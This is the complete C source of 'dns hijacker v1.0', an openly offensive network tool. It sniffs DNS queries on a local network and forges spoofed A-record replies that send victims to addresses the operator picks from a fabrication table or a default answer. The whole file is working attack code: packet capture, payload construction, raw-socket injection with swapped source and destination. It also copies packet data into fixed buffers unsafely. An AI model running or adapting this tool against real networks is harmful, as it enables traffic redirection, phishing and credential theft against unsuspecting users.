/******************************************************************************
 *  [ dns hijacker v1.0 ]                                                     *
 *                                                                            *
 *  pedram amini (pedram@redhive.com)                                         *
 *  www.redhive.com                                                           *
 *                                                                            *
 ******************************************************************************/

#include "dnshijacker.h"

int main (int argc, char **argv)    {
    int  opt,
         i,
         socket;                    /* socket to write on             */
    char *packet,                   /* captured packet                */
         *device      = NULL,       /* interface to sniff on          */
         *ft_filename = NULL,       /* fabrication table filename     */
         filter[1024],              /* tcpdump style capture filter   */
         errbuf[PCAP_ERRBUF_SIZE];  /* error buffer for pcap          */
    struct pcap_pkthdr pcap_h;      /* pcap packet header             */
    pcap_t *capdev;                 /* the capture device             */

    /*
     *  prepare the chewy center
     */

    memset(&chewycenter, '\0', sizeof(struct cc));

    /*
     *  parse the command line
     */

    while ((opt = getopt(argc, argv, "d:f:hi:pv")) != EOF)    {
        switch (opt)  {
            case 'd':               /* default answer */
                chewycenter.default_answer = optarg;
                dflag++;
                break;
            case 'f':               /* fabrication table */
                ft_filename = optarg;
                fflag++;
                break;
            case 'i':               /* interface  */
                device = optarg;
                break;
            case 'p':               /* print only */
                pflag++;
                break;
            case 'v':               /* verbose    */
                vflag++;
                break;
            case 'h':               /* usage      */
            case '?':
                usage(argv);
                break;
        }
    }

    /*
     *  if there is no default spoof address or fabrication table specified
     *  and the user doesn't just want to print captured dns packets
     *  then we have a problem, because we have no idea what to spoof answers with
     */

    if ( !dflag && !fflag && !pflag)
        usage(argv);

    /*
     *  if a fabrication table file was specified fill the ftable with values from it
     */

    if (fflag)
        fill_table(ft_filename);

    /*
     *  make sure there is a device to sniff on
     */

    if (!device)
        device = pcap_lookupdev(errbuf);

    if (!device) {
        fprintf(stderr, "\ndevice lookup failed");
        exit (EXIT_FAILURE);
     }

    /*
     *  set capture filter
     *  defaults to only capturing traffic destined to a nameserver
     */

    argc -= optind;
    argv += optind;

    strcpy(filter, "udp dst port 53");
    if (argc != 0)  {
        strcat(filter, " and ");
        strcat(filter, copy_argv(argv));
    }

    /*
     *  prepare the device for capturing
     */

    capdev = set_cap_dev(device, filter);

    /*
     *  if we're not only watching grab a socket to write on
     */

    if (!pflag)
        if ((socket = libnet_open_raw_sock(IPPROTO_RAW)) == -1)
            libnet_error(LIBNET_ERR_FATAL, "network initialization failed\n");

    /*
     *  print some informative information
     */

    printf("\n[ dns hijacker %s ]\n", VERSION);
    printf("\nsniffing on:       %s", device);
    printf("\nusing filter:      %s", filter);
    if (dflag) printf("\ndefault answer:    %s", chewycenter.default_answer);
    if (fflag) printf("\nfabrication table: %s", ft_filename);
    printf("%s", pflag ? "\nprint only mode\n" : "\n");

    /*
     *  main loop
     *  this is where it all happens...
     *  - sniff a packet
     *  - parse through that packet printing packet information and
     *    store relevant values in our struct
     *  - build an appropriate fabricated answer and
     *    store it in our struct
     *  - if we're not only watching
     *    write the packet
     */

    for (;;)   {
        packet = (u_char *)pcap_next(capdev, &pcap_h);

        if (packet == NULL)
            continue;

        parse_dns(packet);

        if (!pflag)
            spoof_dns(socket);
    }

    /* not reached */
    return (EXIT_SUCCESS);
}


/******************************************************************************
 *  set_cap_dev                                                               *
 *                                                                            *
 *  sniff on appropriate device, set filter, and calculate datalink offset    *
 *  arg1: (char *)   pointer to device name                                   *
 *  arg2: (char *)   pointer to filter string                                 *
 *  ret:  (pcap_t *) pointer to pcap device                                   *
 ******************************************************************************/
pcap_t *set_cap_dev (char *device, char *filter)    {
    unsigned int network, netmask;  /* for filter setting    */
    struct bpf_program prog;        /* store compiled filter */
    struct pcap_pkthdr pcap_h;      /* pcap packet header    */
    pcap_t *capdev;                 /* the capture device    */
    char errbuf[PCAP_ERRBUF_SIZE];  /* pcap error buffer     */

    pcap_lookupnet(device, &network, &netmask, errbuf);

    if ((capdev = pcap_open_live(device, SNAPLEN, PROMISC, 0, errbuf)) == NULL)    {
        perror("pcap_open_live");
        exit (EXIT_FAILURE);
    }

    /*
     *  we only want to see traffic specified by filter
     *  so compile and set it
     */

    pcap_compile(capdev, &prog, filter, 0, netmask);
    pcap_setfilter(capdev, &prog);

    /*
     *  set datalink offset, EN10MB is all we really need
     */

    switch (pcap_datalink(capdev)) {
        case DLT_EN10MB:
            offset = 14;
            break;
        case DLT_IEEE802:
            offset = 22;
            break;
        case DLT_FDDI:
            offset = 21;
            break;
        case DLT_NULL:
            offset = 4;
            break;
        default:
            fprintf(stderr, "\n%s bad datalink type", device);
            exit (EXIT_FAILURE);
            break;
  }
  return capdev;
}


/******************************************************************************
 *  parse_dns                                                                 *
 *                                                                            *
 *  take a packet and print it (verbose or not)                               *
 *  store relevant information in our cc struct                               *
 *  arg1: (char *) pointer to packet                                          *
 *  ret:  none                                                                *
 ******************************************************************************/
void parse_dns (char *packet)   {
    struct   ip      *ip;           /* ip header                   */
    struct   udphdr  *udp;          /* udp header                  */
    struct   dnshdr  *dns;          /* dns header                  */
    char     *data,                 /* pointer to dns payload      */
             *data_backup,          /* we modify data so keep orig */
             name[128];             /* storate for lookup name     */
    u_long   rdata;                 /* rdata in network byte order */
    int      datalen,               /* length of dns payload       */
             c = 1,                 /* used in name extraction     */
             i;                     /* loop counter                */

    ip   = (struct ip     *) (packet + offset);
    udp  = (struct udphdr *) (packet + offset + LIBNET_IP_H);
    dns  = (struct dnshdr *) (packet + offset + LIBNET_IP_H + LIBNET_UDP_H);
    data = (packet + offset + LIBNET_IP_H + LIBNET_UDP_H + LIBNET_DNS_H);

    /*
     *  we modify the data pointer, so save the original position
     */

    data_backup = data;

    /*
     *  print dns packet source_address:port > destination_address:port
     */

    printf("\ndns activity:        %s:%d > ", inet_ntoa(ip->ip_src), ntohs(udp->uh_sport));
    printf("%s:%d",                           inet_ntoa(ip->ip_dst), ntohs(udp->uh_dport));

    /*
     *  clean out our name array and grab length of name to convert
     */

    memset(name, '\0', sizeof(name));
    datalen = strlen(data);

    #if defined DEBUG
            printf("\nDEBUG> datalen: %d", datalen);
    #endif

    /*
     *  convert name...
     *  dns names are of the form 3www7redhive3com
     *  so we start with the first number and drop that many chars into name[]
     *  then we move up the string that many chars and repeat the procedure
     *  we know to stop when we hit a null
     */

    while (c)   {
        c = (char) *data;
        data++;
        strncat(name, data, c);
        data += c;
        strncat(name, ".", 1);
    }

    /*
     *  restore the data pointer
     */

    data = data_backup;

    /* kill the trailing '.' */
    name[datalen-1] = '\0';

    /*
     *  are we looking at a question or an answer?
     */

    if (htons(dns->qdcount) > 0 && htons(dns->ancount) == 0)
        printf("\t[%s = ?]", name);
    else if (htons(dns->ancount) > 0)
        printf("\t[%s = real answer]", name);

    /*
     *  what type of question is it?
     */

    #if defined DEBUG
        printf("\nDEBUG> data: %#x", *(data+datalen+2));
        if ( ((int)*(data+datalen+2)) == T_A)
            printf("\nDEBUG> type: A");

        if ( ((int)*(data+datalen+2)) == T_PTR)
            printf("\nDEBUG> type: PTR");
    #endif

    /*
     *  print more verbose packet information
     */

    if (vflag)   {
        printf("\ndns id:              %d", ntohs(dns->id));
        printf("\nrecursion desired:   %d", dns->rd);
        printf("\ntruncated message:   %d", dns->tc);
        printf("\nauthoritive answer:  %d", dns->aa);
        printf("\nopcode:              %d", dns->opcode);
        printf("\nresponse flag:       %d", dns->qr);
        printf("\nresponse code:       %d", dns->rcode);
        printf("\nrecursion available: %d", dns->ra);
        printf("\nnumber questions:    %d", htons(dns->qdcount));
        printf("\nnumber answers:      %d", htons(dns->ancount));
        printf("\nnumber authority:    %d", htons(dns->nscount));
    }

    /* print seperator */
    printf("\n--");

    /*
     *  bake the chewycenter
     */

    chewycenter.src_address = ip->ip_src.s_addr;
    chewycenter.dst_address = ip->ip_dst.s_addr;
    chewycenter.src_port    = udp->uh_sport;
    chewycenter.dst_port    = udp->uh_dport;
    chewycenter.dns_id      = dns->id;

    /*
     *  we only spoof packets from nameservers
     *  if the source of the question is not a client
     *  we don't waste any time building a packet, simply return
     */

    if (ntohs(chewycenter.dst_port) != 53) {
        return;
    }

    /*
     *  check the question type
     *  the question type is stored in the 2 bytes after the variables length name
     *  if the question is not of type A we return since we are only spoofing those type answers
     */

    if ( ((int)*(data+datalen+2)) == T_A)
        chewycenter.is_a = 1;
    else    {
        chewycenter.is_a = 0;
        return;
    }

    /*
     *  we start clean withno answer, also we set the current question
     */

    chewycenter.current_answer   = NULL;
    strncpy(chewycenter.current_question, name, 128);

    /*
     *  if there is a fabrication table search the list for an appropriate entry
     */

    if (fflag)
        chewycenter.current_answer = search_table(name);

    /*
     *  if an entry was not found and a default address is specified use it
     */

    if (!chewycenter.current_answer && dflag)    {
        chewycenter.current_answer = chewycenter.default_answer;
    }

    /*
     *  if an entry was not found and a default address is not specified then we ignore packet
     */

    if (!chewycenter.current_answer && !dflag)   {
        chewycenter.have_answer = 0;
        return;
    }

    /*
     *  if we've gotten this far it means that we have an answer to write
     */

    chewycenter.have_answer = 1;

    /*
     *  convert rdata from char * to something useable (unsigned long in network byte order)
     */

    rdata = libnet_name_resolve(chewycenter.current_answer, 0);

    /*
     *  build the payload
     *
     *  payload format: (very rudimentary ascii diagram)
     *  +-------------------------------|----------------------|--------------+
     *  | variable length question name | 2 byte question type | 2 byte class |
     *  |-------------------------------|----------------------|--------------|
     *  | variable length answer name   | 2 byte question type | 2 byte class |
     *  |-------------------------------|----------------------|--------------|
     *  | 4 byte time to live           | 2 byte rdata length  | 4 byte rdata |
     *  +-------------------------------|----------------------|--------------+
     *
     *  good lord is this ugly, but it works
     *  00 00 00 00 00 04 = 4 byte ttl + 2 byte rdata length
     *  rdata length is always 4, this is because we are only dealing with T_A
     *  hence rdata will always be a dotted quad
     */

    memcpy(chewycenter.payload, data, datalen + 5);

    memcpy(chewycenter.payload + datalen + 5, data, datalen + 5);

    memcpy(chewycenter.payload + 2 * (datalen + 5), "\x00\x00\x00\x00\x00\x04", 6);

    *((u_long *)(chewycenter.payload + 2 * (datalen + 5) + 6 + 0)) = rdata;

    chewycenter.payload_size = 2 * (datalen + 5) + 10;

    #if defined DEBUG
        printf("\nDEBUG>\ndata [%d]: ", datalen);
            for (i = 0; i < datalen+5; i++)
                printf("%x ", data[i]);
        printf("\n");

        printf("\nDEBUG>\nchewycenter [%d]: ", chewycenter.payload_size);
            for (i = 0; i < chewycenter.payload_size; i++)
                printf("%x ", chewycenter.payload[i]);
        printf("\n");
    #endif
}


/******************************************************************************
 *  spoof_dns                                                                 *
 *                                                                            *
 *  check some conditions, build the actual packet, and write the answer      *
 *  arg1: (int) socket to write on                                            *
 *  ret:  none                                                                *
 ******************************************************************************/
void spoof_dns (int socket)   {
    struct  in_addr src, dst;       /* used for printing addresses */
    int     written_bytes,          /* number of bytes written     */
            packet_size,            /* size of our packet          */
            i;                      /* misc                        */
    u_char  *packet;                /* we build this               */

    /*
     *  check the following conditions before spoofing
     *  if any of these conditions are violated then no spoofing is done
     *  - we only want to spoof packets from a nameserver
     *  - we only want to spoof packets from questions of type A
     *  - we only want to spoof packets if we have an answer
     */

    if (ntohs(chewycenter.dst_port) != 53) {
        printf("\nignoring packet:     destination not a nameserver");
        printf("\n--");
        return;
    }

    if (!chewycenter.is_a)  {
        printf("\nignoring packet:     question is not of type A");
        printf("\n--");
        return;
    }

    if (!chewycenter.have_answer)   {
        printf("\nignoring packet:     no answer for this question");
        printf("\n--");
        return;
    }

    /*
     *  packet memory allocation
     */

    packet_size = chewycenter.payload_size + LIBNET_IP_H + LIBNET_UDP_H + LIBNET_DNS_H;

    libnet_init_packet(packet_size, &packet);
    if (packet == NULL) {
        libnet_error(LIBNET_ERR_FATAL, "libnet_init_packet failed\n");
        return;
    }

    /*
     *  ip header construction
     *  source and destination are swapped here because we are spoofing a reply
     */

    libnet_build_ip(LIBNET_UDP_H + LIBNET_DNS_H,
            0,                                   /* ip tos              */
            0,                                   /* ip id               */
            0,                                   /* fragmentation bits  */
            64,                                  /* ttl                 */
            IPPROTO_UDP,                         /* protocol            */
            chewycenter.dst_address,             /* source address      */
            chewycenter.src_address,             /* destination address */
            NULL,                                /* payload             */
            0,                                   /* payload length      */
            packet);                             /* packet buffer       */

     /*
      *  udp header construction
      *  source and destination ports are swapped here too
      *
      * during debugging i found that we weren't generating the correct
      * length here, that is why a payload length is included (payload + dns_header)
      * although, from what i know, it really shouldn't be here
      */

    libnet_build_udp(53,                         /* source port      */
            ntohs(chewycenter.src_port),         /* destination port */
            NULL,                                /* payload          */
            chewycenter.payload_size + 12,       /* payload length   */
            packet + LIBNET_IP_H);

    /*
     *  dns header construction
     */

    libnet_build_dns(ntohs(chewycenter.dns_id),  /* dns id                      */
            0x8580,                              /* control flags (QR,AA,RD,RA) */
            1,                                   /* number of questions         */
            1,                                   /* number of answer RR's       */
            0,                                   /* number of authority  RR's   */
            0,                                   /* number of additional RR's   */
            chewycenter.payload,                 /* payload                     */
            chewycenter.payload_size,            /* payload length              */
            packet + LIBNET_IP_H + LIBNET_UDP_H);

    /*
     *  calculate checksum
     */

    libnet_do_checksum (packet, IPPROTO_UDP, packet_size - LIBNET_IP_H);

    /*
     *  write packet
     */

    written_bytes = libnet_write_ip(socket, packet, packet_size);

    /*
     *  make sure the number of written bytes jives with what we expect
     */

    if (written_bytes < packet_size)    {
        printf("\nwarning:             ");
        libnet_error(LN_ERR_WARNING, "libnet only wrote %d of %d bytes", written_bytes, packet_size);
        printf("\n--");
    }

    /*
     *  we're done with this packet
     */

    libnet_destroy_packet(&packet);

    /*
     *  announce what we've just done
     *  remember that we've swapped the addresses/ports
     */

    src.s_addr = chewycenter.src_address;
    dst.s_addr = chewycenter.dst_address;

    printf("\nspoofing answer:     %s:%d > ", inet_ntoa(dst), ntohs(chewycenter.dst_port));
    printf("%s:%d",                           inet_ntoa(src), ntohs(chewycenter.src_port));

    printf("\t[%s = %s]", chewycenter.current_question, chewycenter.current_answer);

    #if defined DEBUG
        printf("\nDEBUG>\n payload: [%d]", chewycenter.payload_size);
        for (i = 0; i < 52; i++)
            printf("%x ", chewycenter.payload[i]);
        printf("\n");
    #endif

    printf("\n--");
}


/******************************************************************************
 * fill_table                                                                 *
 *                                                                            *
 *  fill the fabrication table with entries from a file                       *
 *  arg1: (char *) filename                                                   *
 *  ret:  none                                                                *
 ******************************************************************************/
void fill_table (char *ft_filename) {
    FILE *ft;                       /* fstream pointer              */
    int i;                          /* loop counter                 */
    char line[128];                     /* current line being processed */

    /*
     *  open the file
     */

    ft = fopen(ft_filename, "r");

    if (!ft)    {
        perror("fill_table failed");
        exit (1);
    }

    /*
     *  step through the the file line by line
     *  read the first 2 entries from each line, the rest are comments
     *  stop when we've reached MAXENTRIES or the end of the file
     *  whichever comes first.
     */

    for (i = 0; i < MAXENTRIES; i++)    {
        if (fgets(line, 128, ft) == NULL)
            break;

        if ((line[0] == '#') || (line[0] == '\n'))  {
            i--;
            continue;
        }

        sscanf(line, "%s%s", ftable[i].name, ftable[i].ip);
    }

    /*
     *  make a record of how many entries we've read
     */

    num_entries = i;

    #if defined DEBUG
        printf("\nDEBUG> fabrication table:");
        for (i = 0; i < num_entries; i++)
            printf("\n[%d] %s\t%s", i, ftable[i].name, ftable[i].ip);
        printf("\n\n");
    #endif

    /*
     *  we're done with the file, close it
     */

    fclose(ft);
}


/******************************************************************************
 * search_table                                                               *
 *                                                                            *
 *  search the fabrication table and see if we have an answer to this question*
 *  really lame search routine, this is something that needs changing         *
 *  arg1: (char *) entry to search for                                        *
 *  ret:  (char *) the answer (ip address)                                    *
 ******************************************************************************/
char *search_table (char *haystack)  {
    int i;

    for (i = 0; i < num_entries; i++)   {
        if (strstr(haystack, ftable[i].name) != NULL)
            return (ftable[i].ip);
    }

    return NULL;
}


/******************************************************************************
 * copy_argv (from tcpdump)                                                   *
 *                                                                            *
 *  used for extracting filter string from command line                       *
 *  arg1: (char **) pointer to vector arguments                               *
 *  ret:  (char *)  filter string                                             *
 ******************************************************************************/
char *copy_argv (char **argv)    {
    char **p, *buf, *src, *dst;
    u_int len = 0;

    p = argv;
    if (*p == 0)
        return 0;

    while (*p)
        len += strlen(*p++) + 1;

    if ((buf = (char *)malloc(len)) == NULL) {
        perror("malloc");
        exit (EXIT_FAILURE);
    }

    p = argv;
    dst = buf;
    while ((src = *p++) != NULL) {
        while ((*dst++ = *src++) != '\0');
        dst[-1] = ' ';
    }
    dst[-1] = '\0';

    return buf;
}


/******************************************************************************
 *  usage                                                                     *
 *                                                                            *
 *  strip /'s and print program usage                                         *
 *  arg1: (char **) pointer to vector arguments                               *
 *  ret:  none                                                                *
 ******************************************************************************/
void usage (char **argv)    {
    char *p, *name;

    if ((p = strrchr(argv[0], '/')) != NULL)
        name = p + 1;
    else
        name = argv[0];

    printf("\n[ dns hijacker %s ]", VERSION);
    printf("\n Usage: %s [options] optional-tcpdump-filter", name);
    printf("\n \t-d <xxx.xxx.xxx.xxx> default address to answer with");
    printf("\n \t-f <filename> tab delimited fabrication table");
    printf("\n \t-i <interface> to sniff/write on");
    printf("\n \t-p print only, don't spoof answers");
    printf("\n \t-v print verbose dns packet information");
    printf("\n\n");

    exit (EXIT_FAILURE);
}

